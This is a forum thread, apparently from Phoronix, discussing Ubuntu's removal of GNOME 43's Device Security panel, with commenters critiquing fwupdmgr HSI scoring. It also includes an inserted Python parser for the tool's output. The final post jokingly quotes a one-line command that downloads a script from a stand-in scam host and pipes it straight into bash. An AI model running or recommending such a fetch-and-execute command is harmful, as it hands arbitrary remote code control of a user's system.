Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen


  • Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen

    Phoronix: Ubuntu Isn't Yet Onboard With GNOME's "Device Security" Screen

    Coming with GNOME 43 is a "Device Security" panel within the GNOME Control Center. While intended to help ensure their system is protected, Ubuntu isn't onboard with this Device Security functionality yet and has stripped it out from their GNOME build for Ubuntu 22.10...

    https://www.phoronix.com/news/Ubuntu...evice-Security

  • #2
    Good thing to do. It should not be exposed in the GUI unless it allows making all relevant changes via the same GUI. A user advanced enough to set them currently does not have any need for the GUI.



    • #3
      Seems like a worthless feature anyway. Who cares if secure boot and TPM are on? Hell, the only thing it might possibly be good for is seeing that TPM is not on; that would be worthy of celebration, I suppose.

      What even are "platform debugging" and "processor security checks" referring to? They just mean checking if vulnerability mitigations are on, don't they? They're usually always on unless the user turns them off; that doesn't really deserve a check.

      All in all, this seems worthless. Oh, I'm sure a proper device security panel could be made that shows you some relevant information, but this isn't it.

      This panel tries to make security look like an on-or-off thing, but it's not, not really; it's more like a slider or a percentage. Not everyone goes as far as installing SELinux, for instance; some users don't really benefit from vulnerability mitigations (most of these seem more dangerous for servers than regular users in the first place); some people have pretty extreme firewall setups, most leave it pretty much open...

      There are reasons for all choices, tradeoffs (usually either convenience or performance in return for security). A panel that shows you more or less how secure your system is and what could be done to further improve it would be potentially quite useful (if a bit of a crutch, maybe, since such a panel could dangerously make you hyperfocus on what's on the panel and become blind to threats not covered by it), but this GNOME device security panel just seems like lazy, meaningless work.
      Last edited by rabcor; 28 August 2022, 07:21 AM.



      • #4
        If it just exposes the data from fwupdmgr, it does not seem very useful to an average user:
        • Several of the settings in question can only be changed from the BIOS.
        • Some settings may require changes to the kernel command line (turning on the IOMMU on my ThinkPad T480, for example). And those are off by default for a reason: it doesn't work properly on all systems. Recovery from that is easy if you know what you are doing.
        • Some settings may be unavailable for a given hardware generation or on a particular system, preventing higher levels at all on that hardware.
        • On my desktop with a Ryzen 5600X it just refuses to give any score at all due to missing hardware support. So it is an Intel-only feature currently, as far as I can tell.
        So if the data is to be useful to an average user, this feature currently seems half-baked. In fact, even to an expert user and professional software developer it is not easy to parse. What is "CSME manufacturing mode" and how do I change "pre-boot DMA protection"? Even the fwupdmgr documentation is only half-done; it only explains some of these.



        • #5
          “Our distro isn’t secure. Instead of fixing it, let’s hide the panel so people don’t find out!”

          - Ubuntu devs



          • #6
            So I went ahead and filed a bug report about the poor documentation for fwupdmgr: https://github.com/fwupd/fwupd/issues/4959

            Oh, by the way, KDE has exposed this for some time already, though it is pretty hidden:
            1. System Settings -> About this System. In there, click "Show More Information". This opens the separate program "Info Centre" (which you can also launch directly; it has a .desktop file).
            2. Then go to Devices -> Firmware Security. This just shows the output from fwupdmgr security, even using a monospace font to do so (just like terminals do).



            • #7
              Originally posted by cooperate:
              “Our distro isn’t secure. Instead of fixing it, let’s hide the panel so people don’t find out!”

              - Ubuntu devs
              Truth be told, I wouldn't even want it to be secured, given the extent of configuration required to do so (even in Fedora) and the performance hit, with relatively little or no benefit to most users (at least me).
              Last edited by leo_sk; 28 August 2022, 07:57 AM.



              • #8
                Originally posted by Vorpal:
                If it just exposes the data from fwupdmgr, it does not seem very useful to an average user:
                • Several of the settings in question can only be changed from the BIOS.
                • Some settings may require changes to the kernel command line (turning on the IOMMU on my ThinkPad T480, for example). And those are off by default for a reason: it doesn't work properly on all systems. Recovery from that is easy if you know what you are doing.
                • Some settings may be unavailable for a given hardware generation or on a particular system, preventing higher levels at all on that hardware.
                • On my desktop with a Ryzen 5600X it just refuses to give any score at all due to missing hardware support. So it is an Intel-only feature currently, as far as I can tell.
                So if the data is to be useful to an average user, this feature currently seems half-baked. In fact, even to an expert user and professional software developer it is not easy to parse. What is "CSME manufacturing mode" and how do I change "pre-boot DMA protection"? Even the fwupdmgr documentation is only half-done; it only explains some of these.
                This is absolutely horrendous for the end user. If they have an AMD system (which accounts for an increasingly big chunk of the Linux userbase), then there is not even a score. That might lead the user to believe their AMD system is insecure and at risk, when it's just missing some Intel-only gimmicky features. I can't believe they will ship something like that.

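A parser for the human-readable `fwupdmgr security` report that #4 and #8 discuss, as an added example that is not from this thread or from fwupd itself. The sample report is constructed; its layout (an `HSI:N` header line followed by `HSI-N` groups of ✔/✘ attribute lines) and the no-score line are my assumptions about the tool's output. The point is the edge case both posts raise: when the tool gives no numeric score for the hardware, the level comes back as None rather than being mistaken for a failing system.

```python
import re
from typing import Dict, List, Optional

# Constructed sample modelled on the human-readable layout of `fwupdmgr security`.
# The exact layout is an assumption (it varies by fwupd version and platform);
# the attribute names are ones mentioned in this thread.
SAMPLE_OUTPUT = """\
Host Security ID: HSI:1 (v1.8.3)

HSI-1
✔ UEFI secure boot:          Enabled
✔ CSME manufacturing mode:   Locked

HSI-2
✘ Intel BootGuard:           Disabled
✘ Pre-boot DMA protection:   Disabled
✘ IOMMU:                     Unavailable

HSI-3
✘ Platform debugging:        Enabled
"""
# Constructed stand-in for a platform fwupd cannot score (the Ryzen case above).
NO_SCORE_OUTPUT = "Host Security ID: HSI:INVALID (missing data)\n"

HSI_LINE = re.compile(r"^Host Security ID:\s*HSI:(\d+)")
LEVEL_LINE = re.compile(r"^HSI-(\d+)$")
CHECK_LINE = re.compile(r"^([✔✘])\s+(.+?):\s+(\S.*)$")

def parse_hsi_level(text: str) -> Optional[int]:
    """Numeric HSI level, or None when the report carries no score at all."""
    for line in text.splitlines():
        m = HSI_LINE.match(line.strip())
        if m:
            return int(m.group(1))
    return None

def failing_checks(text: str) -> Dict[int, List[str]]:
    """Map each HSI level to the names of its failed (✘) attributes."""
    failed: Dict[int, List[str]] = {}
    level = None
    for raw in text.splitlines():
        line = raw.strip()
        lm = LEVEL_LINE.match(line)
        if lm:
            level = int(lm.group(1))
            continue
        cm = CHECK_LINE.match(line)
        if cm and level is not None and cm.group(1) == "✘":
            failed.setdefault(level, []).append(cm.group(2).strip())
    return failed
```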


                • #9
                  Intel BootGuard
                  Ahh, yes. Let's encourage people to see it as virtuous that your OEM-assembled system (Boot Guard wasn't even available for self-assembled PCs last I checked) has the "feature" that burns extra signature checks into one-time programmable memory in the PCH, permanently ruling out the possibility of BIOS modding and/or Coreboot-y things.

                  Reminds me of how, last I heard, Windows 11 only allows self-built PCs to disable Virtualization Based Security, meaning pre-built PCs are at a permanent disadvantage if your goal is maximum performance.



                  • #10
                    Originally posted by cooperate:
                    “Our distro isn’t secure. Instead of fixing it, let’s hide the panel so people don’t find out!”

                    - Ubuntu devs
                    "You want me to run curl -s http://definitely.not/a_scam.sh | bash? GNOME says my system is secure, so it must be OK"

                    - Probably you
